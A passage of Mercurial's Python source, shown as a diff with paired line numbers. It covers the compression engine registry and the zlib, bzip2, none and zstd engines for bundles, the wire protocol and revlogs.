3285 def forbundletype(self, bundletype):
3288 """Obtain a compression engine registered to a bundle type.
3286 """Obtain a compression engine registered to a bundle type.
3289
3287
3290 Will raise KeyError if the bundle type isn't registered.
3288 Will raise KeyError if the bundle type isn't registered.
3291
3289
3292 Will abort if the engine is known but not available.
3290 Will abort if the engine is known but not available.
3293 """
3291 """
3294 engine = self._engines[self._bundletypes[bundletype]]
3292 engine = self._engines[self._bundletypes[bundletype]]
3295 if not engine.available():
3293 if not engine.available():
3296 raise error.Abort(_('compression engine %s could not be loaded') %
3294 raise error.Abort(_('compression engine %s could not be loaded') %
3297 engine.name())
3295 engine.name())
3298 return engine
3296 return engine
3299
3297
3300 def supportedwireengines(self, role, onlyavailable=True):
3298 def supportedwireengines(self, role, onlyavailable=True):
3301 """Obtain compression engines that support the wire protocol.
3299 """Obtain compression engines that support the wire protocol.
3302
3300
3303 Returns a list of engines in prioritized order, most desired first.
3301 Returns a list of engines in prioritized order, most desired first.
3304
3302
3305 If ``onlyavailable`` is set, filter out engines that can't be
3303 If ``onlyavailable`` is set, filter out engines that can't be
3306 loaded.
3304 loaded.
3307 """
3305 """
3308 assert role in (SERVERROLE, CLIENTROLE)
3306 assert role in (SERVERROLE, CLIENTROLE)
3309
3307
3310 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3308 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3311
3309
3312 engines = [self._engines[e] for e in self._wiretypes.values()]
3310 engines = [self._engines[e] for e in self._wiretypes.values()]
3313 if onlyavailable:
3311 if onlyavailable:
3314 engines = [e for e in engines if e.available()]
3312 engines = [e for e in engines if e.available()]
3315
3313
3316 def getkey(e):
3314 def getkey(e):
3317 # Sort first by priority, highest first. In case of tie, sort
3315 # Sort first by priority, highest first. In case of tie, sort
3318 # alphabetically. This is arbitrary, but ensures output is
3316 # alphabetically. This is arbitrary, but ensures output is
3319 # stable.
3317 # stable.
3320 w = e.wireprotosupport()
3318 w = e.wireprotosupport()
3321 return -1 * getattr(w, attr), w.name
3319 return -1 * getattr(w, attr), w.name
3322
3320
3323 return list(sorted(engines, key=getkey))
3321 return list(sorted(engines, key=getkey))
3324
3322
3325 def forwiretype(self, wiretype):
3323 def forwiretype(self, wiretype):
3326 engine = self._engines[self._wiretypes[wiretype]]
3324 engine = self._engines[self._wiretypes[wiretype]]
3327 if not engine.available():
3325 if not engine.available():
3328 raise error.Abort(_('compression engine %s could not be loaded') %
3326 raise error.Abort(_('compression engine %s could not be loaded') %
3329 engine.name())
3327 engine.name())
3330 return engine
3328 return engine
3331
3329
3332 def forrevlogheader(self, header):
3330 def forrevlogheader(self, header):
3333 """Obtain a compression engine registered to a revlog header.
3331 """Obtain a compression engine registered to a revlog header.
3334
3332
3335 Will raise KeyError if the revlog header value isn't registered.
3333 Will raise KeyError if the revlog header value isn't registered.
3336 """
3334 """
3337 return self._engines[self._revlogheaders[header]]
3335 return self._engines[self._revlogheaders[header]]
3338
3336
3339 compengines = compressormanager()
3337 compengines = compressormanager()
3340
3338
3341 class compressionengine(object):
3339 class compressionengine(object):
3342 """Base class for compression engines.
3340 """Base class for compression engines.
3343
3341
3344 Compression engines must implement the interface defined by this class.
3342 Compression engines must implement the interface defined by this class.
3345 """
3343 """
3346 def name(self):
3344 def name(self):
3347 """Returns the name of the compression engine.
3345 """Returns the name of the compression engine.
3348
3346
3349 This is the key the engine is registered under.
3347 This is the key the engine is registered under.
3350
3348
3351 This method must be implemented.
3349 This method must be implemented.
3352 """
3350 """
3353 raise NotImplementedError()
3351 raise NotImplementedError()
3354
3352
3355 def available(self):
3353 def available(self):
3356 """Whether the compression engine is available.
3354 """Whether the compression engine is available.
3357
3355
3358 The intent of this method is to allow optional compression engines
3356 The intent of this method is to allow optional compression engines
3359 that may not be available in all installations (such as engines relying
3357 that may not be available in all installations (such as engines relying
3360 on C extensions that may not be present).
3358 on C extensions that may not be present).
3361 """
3359 """
3362 return True
3360 return True
3363
3361
3364 def bundletype(self):
3362 def bundletype(self):
3365 """Describes bundle identifiers for this engine.
3363 """Describes bundle identifiers for this engine.
3366
3364
3367 If this compression engine isn't supported for bundles, returns None.
3365 If this compression engine isn't supported for bundles, returns None.
3368
3366
3369 If this engine can be used for bundles, returns a 2-tuple of strings of
3367 If this engine can be used for bundles, returns a 2-tuple of strings of
3370 the user-facing "bundle spec" compression name and an internal
3368 the user-facing "bundle spec" compression name and an internal
3371 identifier used to denote the compression format within bundles. To
3369 identifier used to denote the compression format within bundles. To
3372 exclude the name from external usage, set the first element to ``None``.
3370 exclude the name from external usage, set the first element to ``None``.
3373
3371
3374 If bundle compression is supported, the class must also implement
3372 If bundle compression is supported, the class must also implement
3375 ``compressstream`` and `decompressorreader``.
3373 ``compressstream`` and `decompressorreader``.
3376
3374
3377 The docstring of this method is used in the help system to tell users
3375 The docstring of this method is used in the help system to tell users
3378 about this engine.
3376 about this engine.
3379 """
3377 """
3380 return None
3378 return None
3381
3379
3382 def wireprotosupport(self):
3380 def wireprotosupport(self):
3383 """Declare support for this compression format on the wire protocol.
3381 """Declare support for this compression format on the wire protocol.
3384
3382
3385 If this compression engine isn't supported for compressing wire
3383 If this compression engine isn't supported for compressing wire
3386 protocol payloads, returns None.
3384 protocol payloads, returns None.
3387
3385
3388 Otherwise, returns ``compenginewireprotosupport`` with the following
3386 Otherwise, returns ``compenginewireprotosupport`` with the following
3389 fields:
3387 fields:
3390
3388
3391 * String format identifier
3389 * String format identifier
3392 * Integer priority for the server
3390 * Integer priority for the server
3393 * Integer priority for the client
3391 * Integer priority for the client
3394
3392
3395 The integer priorities are used to order the advertisement of format
3393 The integer priorities are used to order the advertisement of format
3396 support by server and client. The highest integer is advertised
3394 support by server and client. The highest integer is advertised
3397 first. Integers with non-positive values aren't advertised.
3395 first. Integers with non-positive values aren't advertised.
3398
3396
3399 The priority values are somewhat arbitrary and only used for default
3397 The priority values are somewhat arbitrary and only used for default
3400 ordering. The relative order can be changed via config options.
3398 ordering. The relative order can be changed via config options.
3401
3399
3402 If wire protocol compression is supported, the class must also implement
3400 If wire protocol compression is supported, the class must also implement
3403 ``compressstream`` and ``decompressorreader``.
3401 ``compressstream`` and ``decompressorreader``.
3404 """
3402 """
3405 return None
3403 return None
3406
3404
3407 def revlogheader(self):
3405 def revlogheader(self):
3408 """Header added to revlog chunks that identifies this engine.
3406 """Header added to revlog chunks that identifies this engine.
3409
3407
3410 If this engine can be used to compress revlogs, this method should
3408 If this engine can be used to compress revlogs, this method should
3411 return the bytes used to identify chunks compressed with this engine.
3409 return the bytes used to identify chunks compressed with this engine.
3412 Else, the method should return ``None`` to indicate it does not
3410 Else, the method should return ``None`` to indicate it does not
3413 participate in revlog compression.
3411 participate in revlog compression.
3414 """
3412 """
3415 return None
3413 return None
3416
3414
3417 def compressstream(self, it, opts=None):
3415 def compressstream(self, it, opts=None):
3418 """Compress an iterator of chunks.
3416 """Compress an iterator of chunks.
3419
3417
3420 The method receives an iterator (ideally a generator) of chunks of
3418 The method receives an iterator (ideally a generator) of chunks of
3421 bytes to be compressed. It returns an iterator (ideally a generator)
3419 bytes to be compressed. It returns an iterator (ideally a generator)
3422 of bytes of chunks representing the compressed output.
3420 of bytes of chunks representing the compressed output.
3423
3421
3424 Optionally accepts an argument defining how to perform compression.
3422 Optionally accepts an argument defining how to perform compression.
3425 Each engine treats this argument differently.
3423 Each engine treats this argument differently.
3426 """
3424 """
3427 raise NotImplementedError()
3425 raise NotImplementedError()
3428
3426
3429 def decompressorreader(self, fh):
3427 def decompressorreader(self, fh):
3430 """Perform decompression on a file object.
3428 """Perform decompression on a file object.
3431
3429
3432 Argument is an object with a ``read(size)`` method that returns
3430 Argument is an object with a ``read(size)`` method that returns
3433 compressed data. Return value is an object with a ``read(size)`` that
3431 compressed data. Return value is an object with a ``read(size)`` that
3434 returns uncompressed data.
3432 returns uncompressed data.
3435 """
3433 """
3436 raise NotImplementedError()
3434 raise NotImplementedError()
3437
3435
3438 def revlogcompressor(self, opts=None):
3436 def revlogcompressor(self, opts=None):
3439 """Obtain an object that can be used to compress revlog entries.
3437 """Obtain an object that can be used to compress revlog entries.
3440
3438
3441 The object has a ``compress(data)`` method that compresses binary
3439 The object has a ``compress(data)`` method that compresses binary
3442 data. This method returns compressed binary data or ``None`` if
3440 data. This method returns compressed binary data or ``None`` if
3443 the data could not be compressed (too small, not compressible, etc).
3441 the data could not be compressed (too small, not compressible, etc).
3444 The returned data should have a header uniquely identifying this
3442 The returned data should have a header uniquely identifying this
3445 compression format so decompression can be routed to this engine.
3443 compression format so decompression can be routed to this engine.
3446 This header should be identified by the ``revlogheader()`` return
3444 This header should be identified by the ``revlogheader()`` return
3447 value.
3445 value.
3448
3446
3449 The object has a ``decompress(data)`` method that decompresses
3447 The object has a ``decompress(data)`` method that decompresses
3450 data. The method will only be called if ``data`` begins with
3448 data. The method will only be called if ``data`` begins with
3451 ``revlogheader()``. The method should return the raw, uncompressed
3449 ``revlogheader()``. The method should return the raw, uncompressed
3452 data or raise a ``StorageError``.
3450 data or raise a ``StorageError``.
3453
3451
3454 The object is reusable but is not thread safe.
3452 The object is reusable but is not thread safe.
3455 """
3453 """
3456 raise NotImplementedError()
3454 raise NotImplementedError()
3457
3455
3458 class _CompressedStreamReader(object):
3456 class _CompressedStreamReader(object):
3459 def __init__(self, fh):
3457 def __init__(self, fh):
3460 if safehasattr(fh, 'unbufferedread'):
3458 if safehasattr(fh, 'unbufferedread'):
3461 self._reader = fh.unbufferedread
3459 self._reader = fh.unbufferedread
3462 else:
3460 else:
3463 self._reader = fh.read
3461 self._reader = fh.read
3464 self._pending = []
3462 self._pending = []
3465 self._pos = 0
3463 self._pos = 0
3466 self._eof = False
3464 self._eof = False
3467
3465
3468 def _decompress(self, chunk):
3466 def _decompress(self, chunk):
3469 raise NotImplementedError()
3467 raise NotImplementedError()
3470
3468
3471 def read(self, l):
3469 def read(self, l):
3472 buf = []
3470 buf = []
3473 while True:
3471 while True:
3474 while self._pending:
3472 while self._pending:
3475 if len(self._pending[0]) > l + self._pos:
3473 if len(self._pending[0]) > l + self._pos:
3476 newbuf = self._pending[0]
3474 newbuf = self._pending[0]
3477 buf.append(newbuf[self._pos:self._pos + l])
3475 buf.append(newbuf[self._pos:self._pos + l])
3478 self._pos += l
3476 self._pos += l
3479 return ''.join(buf)
3477 return ''.join(buf)
3480
3478
3481 newbuf = self._pending.pop(0)
3479 newbuf = self._pending.pop(0)
3482 if self._pos:
3480 if self._pos:
3483 buf.append(newbuf[self._pos:])
3481 buf.append(newbuf[self._pos:])
3484 l -= len(newbuf) - self._pos
3482 l -= len(newbuf) - self._pos
3485 else:
3483 else:
3486 buf.append(newbuf)
3484 buf.append(newbuf)
3487 l -= len(newbuf)
3485 l -= len(newbuf)
3488 self._pos = 0
3486 self._pos = 0
3489
3487
3490 if self._eof:
3488 if self._eof:
3491 return ''.join(buf)
3489 return ''.join(buf)
3492 chunk = self._reader(65536)
3490 chunk = self._reader(65536)
3493 self._decompress(chunk)
3491 self._decompress(chunk)
3494 if not chunk and not self._pending and not self._eof:
3492 if not chunk and not self._pending and not self._eof:
3495 # No progress and no new data, bail out
3493 # No progress and no new data, bail out
3496 return ''.join(buf)
3494 return ''.join(buf)
3497
3495
3498 class _GzipCompressedStreamReader(_CompressedStreamReader):
3496 class _GzipCompressedStreamReader(_CompressedStreamReader):
3499 def __init__(self, fh):
3497 def __init__(self, fh):
3500 super(_GzipCompressedStreamReader, self).__init__(fh)
3498 super(_GzipCompressedStreamReader, self).__init__(fh)
3501 self._decompobj = zlib.decompressobj()
3499 self._decompobj = zlib.decompressobj()
3502 def _decompress(self, chunk):
3500 def _decompress(self, chunk):
3503 newbuf = self._decompobj.decompress(chunk)
3501 newbuf = self._decompobj.decompress(chunk)
3504 if newbuf:
3502 if newbuf:
3505 self._pending.append(newbuf)
3503 self._pending.append(newbuf)
3506 d = self._decompobj.copy()
3504 d = self._decompobj.copy()
3507 try:
3505 try:
3508 d.decompress('x')
3506 d.decompress('x')
3509 d.flush()
3507 d.flush()
3510 if d.unused_data == 'x':
3508 if d.unused_data == 'x':
3511 self._eof = True
3509 self._eof = True
3512 except zlib.error:
3510 except zlib.error:
3513 pass
3511 pass
3514
3512
3515 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3513 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3516 def __init__(self, fh):
3514 def __init__(self, fh):
3517 super(_BZ2CompressedStreamReader, self).__init__(fh)
3515 super(_BZ2CompressedStreamReader, self).__init__(fh)
3518 self._decompobj = bz2.BZ2Decompressor()
3516 self._decompobj = bz2.BZ2Decompressor()
3519 def _decompress(self, chunk):
3517 def _decompress(self, chunk):
3520 newbuf = self._decompobj.decompress(chunk)
3518 newbuf = self._decompobj.decompress(chunk)
3521 if newbuf:
3519 if newbuf:
3522 self._pending.append(newbuf)
3520 self._pending.append(newbuf)
3523 try:
3521 try:
3524 while True:
3522 while True:
3525 newbuf = self._decompobj.decompress('')
3523 newbuf = self._decompobj.decompress('')
3526 if newbuf:
3524 if newbuf:
3527 self._pending.append(newbuf)
3525 self._pending.append(newbuf)
3528 else:
3526 else:
3529 break
3527 break
3530 except EOFError:
3528 except EOFError:
3531 self._eof = True
3529 self._eof = True
3532
3530
3533 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3531 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3534 def __init__(self, fh):
3532 def __init__(self, fh):
3535 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3533 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3536 newbuf = self._decompobj.decompress('BZ')
3534 newbuf = self._decompobj.decompress('BZ')
3537 if newbuf:
3535 if newbuf:
3538 self._pending.append(newbuf)
3536 self._pending.append(newbuf)
3539
3537
3540 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3538 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3541 def __init__(self, fh, zstd):
3539 def __init__(self, fh, zstd):
3542 super(_ZstdCompressedStreamReader, self).__init__(fh)
3540 super(_ZstdCompressedStreamReader, self).__init__(fh)
3543 self._zstd = zstd
3541 self._zstd = zstd
3544 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3542 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3545 def _decompress(self, chunk):
3543 def _decompress(self, chunk):
3546 newbuf = self._decompobj.decompress(chunk)
3544 newbuf = self._decompobj.decompress(chunk)
3547 if newbuf:
3545 if newbuf:
3548 self._pending.append(newbuf)
3546 self._pending.append(newbuf)
3549 try:
3547 try:
3550 while True:
3548 while True:
3551 newbuf = self._decompobj.decompress('')
3549 newbuf = self._decompobj.decompress('')
3552 if newbuf:
3550 if newbuf:
3553 self._pending.append(newbuf)
3551 self._pending.append(newbuf)
3554 else:
3552 else:
3555 break
3553 break
3556 except self._zstd.ZstdError:
3554 except self._zstd.ZstdError:
3557 self._eof = True
3555 self._eof = True
3558
3556
3559 class _zlibengine(compressionengine):
3557 class _zlibengine(compressionengine):
3560 def name(self):
3558 def name(self):
3561 return 'zlib'
3559 return 'zlib'
3562
3560
3563 def bundletype(self):
3561 def bundletype(self):
3564 """zlib compression using the DEFLATE algorithm.
3562 """zlib compression using the DEFLATE algorithm.
3565
3563
3566 All Mercurial clients should support this format. The compression
3564 All Mercurial clients should support this format. The compression
3567 algorithm strikes a reasonable balance between compression ratio
3565 algorithm strikes a reasonable balance between compression ratio
3568 and size.
3566 and size.
3569 """
3567 """
3570 return 'gzip', 'GZ'
3568 return 'gzip', 'GZ'
3571
3569
3572 def wireprotosupport(self):
3570 def wireprotosupport(self):
3573 return compewireprotosupport('zlib', 20, 20)
3571 return compewireprotosupport('zlib', 20, 20)
3574
3572
3575 def revlogheader(self):
3573 def revlogheader(self):
3576 return 'x'
3574 return 'x'
3577
3575
3578 def compressstream(self, it, opts=None):
3576 def compressstream(self, it, opts=None):
3579 opts = opts or {}
3577 opts = opts or {}
3580
3578
3581 z = zlib.compressobj(opts.get('level', -1))
3579 z = zlib.compressobj(opts.get('level', -1))
3582 for chunk in it:
3580 for chunk in it:
3583 data = z.compress(chunk)
3581 data = z.compress(chunk)
3584 # Not all calls to compress emit data. It is cheaper to inspect
3582 # Not all calls to compress emit data. It is cheaper to inspect
3585 # here than to feed empty chunks through generator.
3583 # here than to feed empty chunks through generator.
3586 if data:
3584 if data:
3587 yield data
3585 yield data
3588
3586
3589 yield z.flush()
3587 yield z.flush()
3590
3588
3591 def decompressorreader(self, fh):
3589 def decompressorreader(self, fh):
3592 return _GzipCompressedStreamReader(fh)
3590 return _GzipCompressedStreamReader(fh)
3593
3591
3594 class zlibrevlogcompressor(object):
3592 class zlibrevlogcompressor(object):
3595 def compress(self, data):
3593 def compress(self, data):
3596 insize = len(data)
3594 insize = len(data)
3597 # Caller handles empty input case.
3595 # Caller handles empty input case.
3598 assert insize > 0
3596 assert insize > 0
3599
3597
3600 if insize < 44:
3598 if insize < 44:
3601 return None
3599 return None
3602
3600
3603 elif insize <= 1000000:
3601 elif insize <= 1000000:
3604 compressed = zlib.compress(data)
3602 compressed = zlib.compress(data)
3605 if len(compressed) < insize:
3603 if len(compressed) < insize:
3606 return compressed
3604 return compressed
3607 return None
3605 return None
3608
3606
3609 # zlib makes an internal copy of the input buffer, doubling
3607 # zlib makes an internal copy of the input buffer, doubling
3610 # memory usage for large inputs. So do streaming compression
3608 # memory usage for large inputs. So do streaming compression
3611 # on large inputs.
3609 # on large inputs.
3612 else:
3610 else:
3613 z = zlib.compressobj()
3611 z = zlib.compressobj()
3614 parts = []
3612 parts = []
3615 pos = 0
3613 pos = 0
3616 while pos < insize:
3614 while pos < insize:
3617 pos2 = pos + 2**20
3615 pos2 = pos + 2**20
3618 parts.append(z.compress(data[pos:pos2]))
3616 parts.append(z.compress(data[pos:pos2]))
3619 pos = pos2
3617 pos = pos2
3620 parts.append(z.flush())
3618 parts.append(z.flush())
3621
3619
3622 if sum(map(len, parts)) < insize:
3620 if sum(map(len, parts)) < insize:
3623 return ''.join(parts)
3621 return ''.join(parts)
3624 return None
3622 return None
3625
3623
3626 def decompress(self, data):
3624 def decompress(self, data):
3627 try:
3625 try:
3628 return zlib.decompress(data)
3626 return zlib.decompress(data)
3629 except zlib.error as e:
3627 except zlib.error as e:
3630 raise error.StorageError(_('revlog decompress error: %s') %
3628 raise error.StorageError(_('revlog decompress error: %s') %
3631 stringutil.forcebytestr(e))
3629 stringutil.forcebytestr(e))
3632
3630
3633 def revlogcompressor(self, opts=None):
3631 def revlogcompressor(self, opts=None):
3634 return self.zlibrevlogcompressor()
3632 return self.zlibrevlogcompressor()
3635
3633
3636 compengines.register(_zlibengine())
3634 compengines.register(_zlibengine())
3637
3635
3638 class _bz2engine(compressionengine):
3636 class _bz2engine(compressionengine):
3639 def name(self):
3637 def name(self):
3640 return 'bz2'
3638 return 'bz2'
3641
3639
3642 def bundletype(self):
3640 def bundletype(self):
3643 """An algorithm that produces smaller bundles than ``gzip``.
3641 """An algorithm that produces smaller bundles than ``gzip``.
3644
3642
3645 All Mercurial clients should support this format.
3643 All Mercurial clients should support this format.
3646
3644
3647 This engine will likely produce smaller bundles than ``gzip`` but
3645 This engine will likely produce smaller bundles than ``gzip`` but
3648 will be significantly slower, both during compression and
3646 will be significantly slower, both during compression and
3649 decompression.
3647 decompression.
3650
3648
3651 If available, the ``zstd`` engine can yield similar or better
3649 If available, the ``zstd`` engine can yield similar or better
3652 compression at much higher speeds.
3650 compression at much higher speeds.
3653 """
3651 """
3654 return 'bzip2', 'BZ'
3652 return 'bzip2', 'BZ'
3655
3653
3656 # We declare a protocol name but don't advertise by default because
3654 # We declare a protocol name but don't advertise by default because
3657 # it is slow.
3655 # it is slow.
3658 def wireprotosupport(self):
3656 def wireprotosupport(self):
3659 return compewireprotosupport('bzip2', 0, 0)
3657 return compewireprotosupport('bzip2', 0, 0)
3660
3658
3661 def compressstream(self, it, opts=None):
3659 def compressstream(self, it, opts=None):
3662 opts = opts or {}
3660 opts = opts or {}
3663 z = bz2.BZ2Compressor(opts.get('level', 9))
3661 z = bz2.BZ2Compressor(opts.get('level', 9))
3664 for chunk in it:
3662 for chunk in it:
3665 data = z.compress(chunk)
3663 data = z.compress(chunk)
3666 if data:
3664 if data:
3667 yield data
3665 yield data
3668
3666
3669 yield z.flush()
3667 yield z.flush()
3670
3668
3671 def decompressorreader(self, fh):
3669 def decompressorreader(self, fh):
3672 return _BZ2CompressedStreamReader(fh)
3670 return _BZ2CompressedStreamReader(fh)
3673
3671
3674 compengines.register(_bz2engine())
3672 compengines.register(_bz2engine())
3675
3673
3676 class _truncatedbz2engine(compressionengine):
3674 class _truncatedbz2engine(compressionengine):
3677 def name(self):
3675 def name(self):
3678 return 'bz2truncated'
3676 return 'bz2truncated'
3679
3677
3680 def bundletype(self):
3678 def bundletype(self):
3681 return None, '_truncatedBZ'
3679 return None, '_truncatedBZ'
3682
3680
3683 # We don't implement compressstream because it is hackily handled elsewhere.
3681 # We don't implement compressstream because it is hackily handled elsewhere.
3684
3682
3685 def decompressorreader(self, fh):
3683 def decompressorreader(self, fh):
3686 return _TruncatedBZ2CompressedStreamReader(fh)
3684 return _TruncatedBZ2CompressedStreamReader(fh)
3687
3685
3688 compengines.register(_truncatedbz2engine())
3686 compengines.register(_truncatedbz2engine())
3689
3687
3690 class _noopengine(compressionengine):
3688 class _noopengine(compressionengine):
3691 def name(self):
3689 def name(self):
3692 return 'none'
3690 return 'none'
3693
3691
3694 def bundletype(self):
3692 def bundletype(self):
3695 """No compression is performed.
3693 """No compression is performed.
3696
3694
3697 Use this compression engine to explicitly disable compression.
3695 Use this compression engine to explicitly disable compression.
3698 """
3696 """
3699 return 'none', 'UN'
3697 return 'none', 'UN'
3700
3698
3701 # Clients always support uncompressed payloads. Servers don't because
3699 # Clients always support uncompressed payloads. Servers don't because
3702 # unless you are on a fast network, uncompressed payloads can easily
3700 # unless you are on a fast network, uncompressed payloads can easily
3703 # saturate your network pipe.
3701 # saturate your network pipe.
3704 def wireprotosupport(self):
3702 def wireprotosupport(self):
3705 return compewireprotosupport('none', 0, 10)
3703 return compewireprotosupport('none', 0, 10)
3706
3704
3707 # We don't implement revlogheader because it is handled specially
3705 # We don't implement revlogheader because it is handled specially
3708 # in the revlog class.
3706 # in the revlog class.
3709
3707
3710 def compressstream(self, it, opts=None):
3708 def compressstream(self, it, opts=None):
3711 return it
3709 return it
3712
3710
3713 def decompressorreader(self, fh):
3711 def decompressorreader(self, fh):
3714 return fh
3712 return fh
3715
3713
3716 class nooprevlogcompressor(object):
3714 class nooprevlogcompressor(object):
3717 def compress(self, data):
3715 def compress(self, data):
3718 return None
3716 return None
3719
3717
3720 def revlogcompressor(self, opts=None):
3718 def revlogcompressor(self, opts=None):
3721 return self.nooprevlogcompressor()
3719 return self.nooprevlogcompressor()
3722
3720
3723 compengines.register(_noopengine())
3721 compengines.register(_noopengine())
3724
3722
3725 class _zstdengine(compressionengine):
3723 class _zstdengine(compressionengine):
3726 def name(self):
3724 def name(self):
3727 return 'zstd'
3725 return 'zstd'
3728
3726
3729 @propertycache
3727 @propertycache
3730 def _module(self):
3728 def _module(self):
3731 # Not all installs have the zstd module available. So defer importing
3729 # Not all installs have the zstd module available. So defer importing
3732 # until first access.
3730 # until first access.
3733 try:
3731 try:
3734 from . import zstd
3732 from . import zstd
3735 # Force delayed import.
3733 # Force delayed import.
3736 zstd.__version__
3734 zstd.__version__
3737 return zstd
3735 return zstd
3738 except ImportError:
3736 except ImportError:
3739 return None
3737 return None
3740
3738
3741 def available(self):
3739 def available(self):
3742 return bool(self._module)
3740 return bool(self._module)
3743
3741
3744 def bundletype(self):
3742 def bundletype(self):
3745 """A modern compression algorithm that is fast and highly flexible.
3743 """A modern compression algorithm that is fast and highly flexible.
3746
3744
3747 Only supported by Mercurial 4.1 and newer clients.
3745 Only supported by Mercurial 4.1 and newer clients.
3748
3746
3749 With the default settings, zstd compression is both faster and yields
3747 With the default settings, zstd compression is both faster and yields
3750 better compression than ``gzip``. It also frequently yields better
3748 better compression than ``gzip``. It also frequently yields better
3751 compression than ``bzip2`` while operating at much higher speeds.
3749 compression than ``bzip2`` while operating at much higher speeds.
3752
3750
3753 If this engine is available and backwards compatibility is not a
3751 If this engine is available and backwards compatibility is not a
3754 concern, it is likely the best available engine.
3752 concern, it is likely the best available engine.
3755 """
3753 """
3756 return 'zstd', 'ZS'
3754 return 'zstd', 'ZS'
3757
3755
3758 def wireprotosupport(self):
3756 def wireprotosupport(self):
3759 return compewireprotosupport('zstd', 50, 50)
3757 return compewireprotosupport('zstd', 50, 50)
3760
3758
3761 def revlogheader(self):
3759 def revlogheader(self):
3762 return '\x28'
3760 return '\x28'
3763
3761
3764 def compressstream(self, it, opts=None):
3762 def compressstream(self, it, opts=None):
3765 opts = opts or {}
3763 opts = opts or {}
3766 # zstd level 3 is almost always significantly faster than zlib
3764 # zstd level 3 is almost always significantly faster than zlib
3767 # while providing no worse compression. It strikes a good balance
3765 # while providing no worse compression. It strikes a good balance
3768 # between speed and compression.
3766 # between speed and compression.
3769 level = opts.get('level', 3)
3767 level = opts.get('level', 3)
3770
3768
3771 zstd = self._module
3769 zstd = self._module
3772 z = zstd.ZstdCompressor(level=level).compressobj()
3770 z = zstd.ZstdCompressor(level=level).compressobj()
3773 for chunk in it:
3771 for chunk in it:
3774 data = z.compress(chunk)
3772 data = z.compress(chunk)
3775 if data:
3773 if data:
3776 yield data
3774 yield data
3777
3775
3778 yield z.flush()
3776 yield z.flush()
3779
3777
3780 def decompressorreader(self, fh):
3778 def decompressorreader(self, fh):
3781 return _ZstdCompressedStreamReader(fh, self._module)
3779 return _ZstdCompressedStreamReader(fh, self._module)
3782
3780
3783 class zstdrevlogcompressor(object):
3781 class zstdrevlogcompressor(object):
3784 def __init__(self, zstd, level=3):
3782 def __init__(self, zstd, level=3):
3785 # TODO consider omitting frame magic to save 4 bytes.
3783 # TODO consider omitting frame magic to save 4 bytes.
3786 # This writes content sizes into the frame header. That is
3784 # This writes content sizes into the frame header. That is
3787 # extra storage. But it allows a correct size memory allocation
3785 # extra storage. But it allows a correct size memory allocation
3788 # to hold the result.
3786 # to hold the result.
3789 self._cctx = zstd.ZstdCompressor(level=level)
3787 self._cctx = zstd.ZstdCompressor(level=level)
3790 self._dctx = zstd.ZstdDecompressor()
3788 self._dctx = zstd.ZstdDecompressor()
3791 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3789 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3792 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3790 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3793
3791
3794 def compress(self, data):
3792 def compress(self, data):
3795 insize = len(data)
3793 insize = len(data)
3796 # Caller handles empty input case.
3794 # Caller handles empty input case.
3797 assert insize > 0
3795 assert insize > 0
3798
3796
3799 if insize < 50:
3797 if insize < 50:
3800 return None
3798 return None
3801
3799
3802 elif insize <= 1000000:
3800 elif insize <= 1000000:
3803 compressed = self._cctx.compress(data)
3801 compressed = self._cctx.compress(data)
3804 if len(compressed) < insize:
3802 if len(compressed) < insize:
3805 return compressed
3803 return compressed
3806 return None
3804 return None
3807 else:
3805 else:
3808 z = self._cctx.compressobj()
3806 z = self._cctx.compressobj()
3809 chunks = []
3807 chunks = []
3810 pos = 0
3808 pos = 0
3811 while pos < insize:
3809 while pos < insize:
3812 pos2 = pos + self._compinsize
3810 pos2 = pos + self._compinsize
3813 chunk = z.compress(data[pos:pos2])
3811 chunk = z.compress(data[pos:pos2])
3814 if chunk:
3812 if chunk:
3815 chunks.append(chunk)
3813 chunks.append(chunk)
3816 pos = pos2
3814 pos = pos2
3817 chunks.append(z.flush())
3815 chunks.append(z.flush())
3818
3816
3819 if sum(map(len, chunks)) < insize:
3817 if sum(map(len, chunks)) < insize:
3820 return ''.join(chunks)
3818 return ''.join(chunks)
3821 return None
3819 return None
3822
3820
3823 def decompress(self, data):
3821 def decompress(self, data):
3824 insize = len(data)
3822 insize = len(data)
3825
3823
3826 try:
3824 try:
3827 # This was measured to be faster than other streaming
3825 # This was measured to be faster than other streaming
3828 # decompressors.
3826 # decompressors.
3829 dobj = self._dctx.decompressobj()
3827 dobj = self._dctx.decompressobj()
3830 chunks = []
3828 chunks = []
3831 pos = 0
3829 pos = 0
3832 while pos < insize:
3830 while pos < insize:
3833 pos2 = pos + self._decompinsize
3831 pos2 = pos + self._decompinsize
3834 chunk = dobj.decompress(data[pos:pos2])
3832 chunk = dobj.decompress(data[pos:pos2])
3835 if chunk:
3833 if chunk:
3836 chunks.append(chunk)
3834 chunks.append(chunk)
3837 pos = pos2
3835 pos = pos2
3838 # Frame should be exhausted, so no finish() API.
3836 # Frame should be exhausted, so no finish() API.
3839
3837
3840 return ''.join(chunks)
3838 return ''.join(chunks)
3841 except Exception as e:
3839 except Exception as e:
3842 raise error.StorageError(_('revlog decompress error: %s') %
3840 raise error.StorageError(_('revlog decompress error: %s') %
3843 stringutil.forcebytestr(e))
3841 stringutil.forcebytestr(e))
3844
3842
3845 def revlogcompressor(self, opts=None):
3843 def revlogcompressor(self, opts=None):
3846 opts = opts or {}
3844 opts = opts or {}
3847 return self.zstdrevlogcompressor(self._module,
3845 return self.zstdrevlogcompressor(self._module,
3848 level=opts.get('level', 3))
3846 level=opts.get('level', 3))
3849
3847
3850 compengines.register(_zstdengine())
3848 compengines.register(_zstdengine())
3851
3849
3852 def bundlecompressiontopics():
3850 def bundlecompressiontopics():
3853 """Obtains a list of available bundle compressions for use in help."""
